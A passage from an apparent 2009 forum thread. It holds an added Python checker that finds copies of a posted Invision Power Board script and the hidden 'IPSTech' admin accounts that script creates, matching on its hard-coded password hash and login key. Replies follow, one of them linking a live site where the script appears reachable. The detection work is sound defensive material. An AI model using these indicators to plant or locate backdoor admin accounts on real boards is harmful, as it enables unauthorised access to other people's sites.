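A defender's check built from the constants in the script posted above, as an added example that is not part of the original post or of any Invision Power tool: `scan_webroot` flags PHP files that carry the script's file names or strings (so renamed copies are still found), and `audit_members` flags exported member rows that match what its "Create Admin" cases insert. The function names, the extension list, the 2 MiB read cap and the row-export format (lists of dicts keyed by column name) are assumptions.

```python
"""Added example: find leftovers of the support script posted in this thread."""
import os
import re
import tempfile

# Strings copied from the script in the post above (matched case-insensitively).
FILE_MARKERS = {
    label: re.compile(pattern, re.I)
    for label, pattern in {
        "page title": rb"IPB Misc\. Tools",
        "banner": rb"Invision Power Board Test Scripts",
        "hard-coded password hash": rb"225517b79a5066eae41064807e6fe248",
        "account creation message": rb"IPSTech</b> admin account created",
        "fixed member_login_key": rb"6a2e8dfcf00c70ba13bfbac204e8d841",
        "trailer comment": rb"Keith's copy",
    }.items()
}
KNOWN_NAMES = {"supascript.php", "ipbtester.php"}  # names that appear in the post
PHP_EXTENSIONS = (".php", ".php5", ".phtml", ".inc")  # assumption: PHP-handled types
MAX_BYTES = 2 * 1024 * 1024  # assumption: read cap per file

# Values the two "Create Admin" cases insert, copied from the post.
TOOL_NAME = "ipstech"
TOOL_EMAIL = "tech@invisionpower.com"
TOOL_LOGIN_KEY = "6a2e8dfcf00c70ba13bfbac204e8d841"
TOOL_SALT = "5lo9f"
ADMIN_GROUP = 4


def scan_webroot(root, min_hits=2):
    """Return sorted [(path, [reasons])] for files that look like the script.

    A file is reported when its name is in KNOWN_NAMES or when at least
    `min_hits` content markers match, so renamed copies are still found.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            reasons = ["file name"] if name.lower() in KNOWN_NAMES else []
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_BYTES)
            except OSError:
                data = b""  # unreadable file: judge by name only
            hits = [label for label, rx in FILE_MARKERS.items() if rx.search(data)]
            if reasons or len(hits) >= min_hits:
                findings.append((path, reasons + hits))
    return sorted(findings)


def _norm(row, key):
    """Lower-cased, trimmed string value of a column (empty if missing)."""
    return str(row.get(key) or "").strip().lower()


def audit_members(members, converge=()):
    """Return {member_id: [reasons]} for rows matching the tool's footprint.

    `members` and `converge` are rows exported from the members and
    members_converge tables, using the column names in the posted inserts.
    """
    salts = {str(c.get("converge_id")): c.get("converge_pass_salt") for c in converge}
    report = {}
    for row in members:
        reasons = []
        if TOOL_NAME in (_norm(row, "name"), _norm(row, "members_l_username")):
            reasons.append("name IPSTech")
        if _norm(row, "email") == TOOL_EMAIL:
            reasons.append("email tech@invisionpower.com")
        if _norm(row, "member_login_key") == TOOL_LOGIN_KEY:
            reasons.append("fixed member_login_key")
        if salts.get(str(row.get("id"))) == TOOL_SALT:
            reasons.append("fixed converge salt")
        if reasons and int(row.get("mgroup") or 0) == ADMIN_GROUP:
            reasons.append("in admin group 4")
        if reasons:
            report[row.get("id")] = reasons
    return report


if __name__ == "__main__":
    # Constructed sample data, not taken from any real board.
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "helper.php"), "wb") as fh:
            fh.write(b"<title>IPB Misc. Tools</title><!-- Keith's copy -->")
        for path, reasons in scan_webroot(root):
            print(os.path.basename(path), reasons)
    rows = [{"id": 7, "name": "IPSTech", "email": TOOL_EMAIL, "mgroup": 4}]
    print(audit_members(rows, [{"converge_id": 7, "converge_pass_salt": TOOL_SALT}]))
```

A single content marker is not enough to flag a file by default, which keeps ordinary board files that merely mention one of these strings out of the report.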
Posted: Sat Apr 11, 2009 7:00 am
ThinSmoke
Advanced user
Joined: Nov 15, 2008
Posts: 55




Very nice share, thx a lot :3
View user's profile Send private message
Posted: Wed May 06, 2009 1:56 pm
Dope-R
Beginner
Joined: May 06, 2009
Posts: 1




Doesn't seem 2B a backdoor. Looks more like a testing tool;

http://www.vwfixx.com/forums/supascript.php
View user's profile Send private message MSN Messenger
Posted: Thu May 21, 2009 9:01 am
ThinSmoke
Advanced user
Joined: Nov 15, 2008
Posts: 55




Can still use it as a reference for a lot of stuff : )
View user's profile Send private message